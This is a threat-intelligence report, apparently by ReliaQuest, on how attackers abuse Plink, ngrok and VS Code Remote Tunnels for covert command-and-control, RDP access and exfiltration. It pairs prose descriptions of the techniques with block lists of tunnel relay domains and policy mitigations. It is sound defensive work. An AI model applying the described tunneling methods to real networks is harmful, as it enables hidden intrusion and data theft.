Protocol Tunneling: Tools and Techniques

Key Points 

• Protocol tunneling is a technique attackers often use to bypass network defenses, encapsulating malicious traffic within commonly allowed protocols like HTTP, DNS, and SSH.
• Protocol tunneling is an attractive technique for command-and-control (C2) because it can blend in with legitimate traffic and cloud services for stealthy persistent access and exfiltration.
• Tools like Plink for SSH tunneling, ngrok for HTTP/HTTPS tunneling, and Visual Studio Code (VS Code) Remote Tunnels for remote development tunneling allow threat actors to disguise themselves among legitimate administrator activity.
• To prevent abuse, we recommend blocking proxy domains used by tools like ngrok and VS Code Remote Tunnels, implementing Software Restriction Policies, and setting endpoint detection and response (EDR) tools to block mode.

Protocol tunneling is a technique used to encapsulate one network protocol within another, allowing data to be transmitted through a secure or otherwise-allowed protocol. There are many legitimate use cases for protocol tunneling in enterprise environments. Tunneling protocols provide encryption and secure channels for data transmission, protecting sensitive information from unauthorized access. They also allow users to easily access remote resources and services to test, manage, and troubleshoot applications and systems.

On the other hand, threat actors often use this method to bypass network defenses and maintain covert command-and-control (C2) channels after compromising hosts within an environment. By encapsulating malicious traffic within commonly permitted protocols such as HTTP, Domain Name System (DNS), or SSH, attackers can evade firewalls, intrusion detection systems (IDS), and other security measures that might otherwise detect and block their activities. If these communication channels are not detected and remediated following an intrusion, the threat actor will not successfully be removed from the environment, allowing them to continue their attack.

The primary motivations for using protocol tunneling include evading security controls, blending malicious traffic with legitimate network traffic to avoid detection, maintaining persistent access to compromised systems, and enabling the covert exfiltration of sensitive data. The technique is often accomplished using legitimate tools designed for secure remote access and development purposes that are repurposed for malicious activities. Tools such as Plink and ngrok offer a simple way to establish tunnels; we have observed cybercriminals use these tools for intrusion in multiple ransomware and extortion attacks over the past few years. Additionally, ReliaQuest recently investigated a customer incident involving the use of a newer tunneling feature in Visual Studio Code (VS Code), a source code editor from Microsoft. This report—the first in a series on protocol tunneling—outlines why threat actors use protocol tunneling, explores common tools used to tunnel network traffic, and provides actionable recommendations to prevent the malicious use of these tools. Subsequent reports in this series will delve deeper into hunting for the presence of specific tools within networks.

Malicious Use of Protocol Tunneling

Below are some of the ways and reasons that threat actors leverage tunneling protocols to bypass security controls and monitoring systems.

Bypassing Network Controls

• Evading security policies: Firewalls and network filters often block specific protocols or ports associated with malicious activity. Tunneling traffic through allowed protocols (such as HTTP, DNS, and SSH) can bypass these restrictions.
• Circumventing content inspection: Some security devices perform deep packet inspection (DPI) to identify and block malicious content. Tunneling techniques using encryption can obfuscate payloads, making it harder for DPI systems to detect and analyze the traffic.

Maintaining Stealth

• Blending with legitimate traffic: By encapsulating malicious traffic within commonly used protocols (e.g., HTTPS), attackers can disguise their communication as legitimate traffic, reducing the likelihood of detection.
• Using public cloud services: Attackers can route their traffic through legitimate public cloud services like ngrok Edge and Microsoft. Traffic to these services can be common in networks and is often considered benign.

Persistent Access

• Establishing reliable communication: Tunneling ensures that attackers can maintain a reliable communication channel with compromised systems, even if network configurations change or additional security measures are implemented.
• Evading network segmentation: In segmented networks, direct communication between different network segments may be restricted. Tunneling can bridge these segments, allowing attackers to move laterally within the network.

Data Exfiltration

• Concealing data theft: Attackers can use tunnels to exfiltrate sensitive data covertly. Encapsulating data within legitimate protocols makes it difficult for security systems to identify and block the exfiltration.
• Avoiding detection: Traditional network monitoring tools might not inspect the contents of tunneled traffic, allowing attackers to exfiltrate data without raising alarms.

Common Tunneling Tools

Adding to the stealthy nature of this technique, tunneling can often be accomplished with tools designed for legitimate purposes such as secure remote access or code development and testing. While some threat actors use custom malware for tunneling traffic, other adversaries choose legitimate tools that camouflage their traffic as administrator activity, preventing detection. Below, we provide an overview of three commonly used tunneling protocol tools: Plink, ngrok, and VS Code.

Plink

Plink, a command-line interface (CLI) to the PuTTY backend, is a versatile tool designed for legitimate purposes such as secure remote access. Attackers can exploit its capabilities to establish covert communication channels and maintain control over compromised systems. By using Plink, threat actors can encapsulate other types of traffic within encrypted SSH tunnels, helping them bypass security controls.

How Threat Actors Use Plink

SSH tunnels using Plink are typically established using port forwarding, which is a technique used to redirect network traffic from one port to another, enabling secure communication between different network segments. Attackers exploit this functionality by using Plink to establish both local and remote port forwarding.

Local port forwarding and remote port forwarding are two methods used to redirect network traffic through an encrypted SSH tunnel, but they serve different purposes. Local port forwarding redirects traffic from a local port on the attacker’s machine to a specified destination on the target server. This is commonly used to access local services running on the target SSH server, or services running on other hosts in the same network segment.

In contrast, remote port forwarding redirects traffic from a port on a remote attacker-controlled server to a specified service on the client machine. This is the most common method we see attackers use, since it can be used to expose a local service on an internal machine to the outside world via the remote attacker server. For example, an attacker can set up remote port forwarding to forward traffic on their server to the RDP service on the target compromised machine. This can allow an attacker to RDP to an internal host behind a firewall that does not allow inbound RDP.

We have seen more than 200 mentions on dark web platforms of using Plink for port forwarding and to tunnel protocols like RDP. In one such post, for example, a forum user provided a tutorial on how to use “the Netcat shell and plink.exe” to “set up remote port forwarding from the victim’s system to my machine” to access remote desktop for a host behind a firewall in an internal network (quotations translated from Russian). They shared detailed steps and example commands to set up port forwarding to access the RDP service.

Mitigations

To perform port forwarding with Plink, the host must establish an outbound SSH connection. Create network policies using protocol aware firewall devices to block outbound SSH traffic for devices that do not need to communicate with external devices over SSH. Additionally, implement Group Policy Objects (GPOs) for Software Restriction Policies (SRP) in Active Directory (AD) to prevent the execution of Plink enterprise-wide if the tool is not legitimately used. Exceptions should be made for administrators and devices that require its use.

ngrok

ngrok is a popular tool designed to create secure tunnels from a public endpoint to a local service, often used by developers to expose local servers to the internet for testing and development purposes. It works by providing a unique, publicly accessible URL that forwards traffic to a specified port on the local machine. While ngrok has many legitimate uses, attackers exploit its capabilities to bypass network controls and establish covert communication channels. The notorious cybercrime group “Scattered Spider” has used ngrok to establish persistent access in many intrusions, including an incident observed by ReliaQuest in November 2023.

How Threat Actors Use ngrok

By encapsulating traffic within commonly allowed protocols such as HTTP and HTTPS, ngrok can evade firewalls and intrusion detection systems that might otherwise block direct connections. Attackers use ngrok to quickly and easily create temporary, dynamic URLs that are difficult to track and block, allowing them to maintain remote control over compromised systems, exfiltrate data, and execute commands without raising alarms.

Similar to SSH tunneling, ngrok can make services on internal machines accessible through a firewall. The difference is that ngrok tunnels traffic through HTTP and HTTPS. Additionally, traffic is tunneled through ngrok’s global network of servers and accessed via dynamic URLs, removing the need for attackers to administer their own proxy. This can also make traffic harder to detect, especially if ngrok is used legitimately in an environment.

We have observed users on dark web forums suggest the use of ngrok to other users who are looking for a way to get remote access to internal services on a compromised host behind a firewall. One user, for instance, was seeking “a socks4 proxy type for connect to a local network with other devices.” The ReliaQuest Threat Research team has identified more than 400 posts on dark web platforms related to using ngrok to tunnel traffic for remote access. Additionally, some remote-access trojans (RAT) like XWorm and Anarchy Panel RAT are advertised as having built-in capabilities to install ngrok, indicating it is a popular tool for facilitating remote access.

While ngrok can be used for various purposes, we most often see it used to access RDP and gain remote access on compromised hosts. By installing ngrok on a compromised host and configuring it for RDP port 3389, an attacker can establish a remote session on internal clients within a network. Alternatively, ngrok might be used to tunnel access for a Virtual Network Computing (VNC) connection—a graphical desktop-sharing technology that uses the Remote Frame Buffer protocol to provide RDP-like control over another computer. Threat actors may choose to install a VNC server on a compromised host and then use ngrok to make that server accessible, granting them remote access.

Mitigations

ngrok uses a network of servers that relay traffic to the upstream service running on the client. Create network policies in the environment to block traffic to the following domains.

Tool	Network Relay
ngrok	*.ngrok.com, *.ngrok.io, *.ngrok-free.app, *.ngrok-free.dev, *.ngrok.app, *.ngrok.dev

Additionally, implement GPOs for SRP in AD to prevent the execution of ngrok. Create exceptions for these network and host controls to allow hosts or users that use the software to serve a legitimate business function.

VS Code Remote Tunnels

VS Code has become a cornerstone in the modern developer’s toolkit, celebrated for its versatility and broad extension library. Many enterprises and consumers alike have relied on its convenience. One of these conveniences can be found in VS Code’s tunneling ability, Remote Tunnels. VS Code Remote Tunnels is a feature crafted to elevate the remote development experience by enabling secure and seamless connections to remote machines via  Microsoft dev tunnels, essentially integrating local and remote workflows. While primarily aimed at legitimate use cases such as remote debugging, code navigation, and collaborative development, Remote Tunnels can be leveraged by malicious actors to establish covert communication channels and maintain persistent access to compromised systems.

How Threat Actors Use VS Code Remote Tunnels

Leveraging the VS Code CLI, attackers can initiate tunnels authenticated through GitHub, effectively bypassing traditional security defenses due to the signed and trusted nature of the VS Code binary. This tunnel establishes an encrypted connection over HTTPS and essentially provides reverse shell access to an internal host. With this access, an attacker can execute commands, navigate the file system, and even exfiltrate data from the remote machine with minimal detection risk. The legitimate appearance of the VS Code binary enables it to evade detection mechanisms that would normally catch malicious tunnel abuse, such as static detections, antivirus software, or EDR.

Moreover, the tunneled traffic is routed through Microsoft’s domains, such as visualstudio.com, blending seamlessly with legitimate traffic and complicating the detection of malicious activities. Attackers can exploit this feature to establish a reverse shell, granting them extensive control over the target system without raising immediate alarms. While VS Code Remote Tunnels is currently not as prevalent a tool as Plink and ngrok, and we have yet not seen its use mentioned on criminal forums, ReliaQuest has observed malicious VS Code tunneling for remote shell access in a recent incident. Given the trusted nature of the software, it is likely that use of this technique could increase in the future.

Mitigations

Similar to ngrok, VS Code Remote Tunnels uses cloud-hosted servers to relay traffic to the client machine. Create network policies in the environment to block traffic to the following domains.

Tool	Network Relay
VS Code Dev Tunnels	*.tunnels.api.visualstudio.com, *.devtunnels.ms

Additionally, GPOs can be configured to control access to Dev Tunnels, including the ability to disable the service. Refer to documentation from Microsoft to create policies to disable Dev Tunnels Windows hosts in the environment. Create exceptions for these network and host controls to allow hosts or users that use the feature for a legitimate business function.

Threat Forecast

Protocol tunneling has proven to be an effective technique used by threat actors to secure remote access to internal network clients. We predict, with high confidence, that the use of protocol tunneling tools will not decrease in the long term. Tools like ngrok and Plink have been used by threat actors for years and offer an easily deployable means to evade detection and establish persistent access to compromised systems. The growing adoption of encrypted traffic and the ubiquitous use of cloud services also provide a fertile ground for these tools to operate undetected. Additionally, the relatively new tunnel feature in VS Code offers arguably an even stealthier way to establish remote access. Because the software benefits from the trusted nature of Microsoft products, it is likely that its abuse will become more popular among threat actors.

What ReliaQuest Is Doing

To identify suspicious tunnelling, ReliaQuest offers the detection rules. These rules will alert defenders to suspicious activity related to protocol tunnelling. To remediate suspicious activity, associated GreyMatter Respond Plays can be executed by ReliaQuest customers or by the ReliaQuest team on a customer’s behalf.

Recommendations and Best Practices

The ReliaQuest Threat Research team offers the following inexhaustive list of recommendations and best practices to establish a secure foundation against the threats and tactics, techniques, and procedures (TTPs) mentioned in this report.

• Block network relays for tunneling tools: Configure firewalls and forward proxies to block network relays for ngrok and VS Code Remote Tunnels. Configure policies to block outbound SSH traffic for network segments that do not need to make external SSH connections.
• Block unwanted tools via application control: Use SRPs in Active Directory to prevent certain applications from executing. Additionally, dedicated application control technologies can also perform this function and block specific software from running.
• Set EDR to prevent mode: Set EDR tools to run in prevent/block mode instead of detect-only modes. The use of tunneling tools typically occurs after a system is compromised by malware. EDR technologies in block mode could prevent execution of common malware that provide initial access to attackers.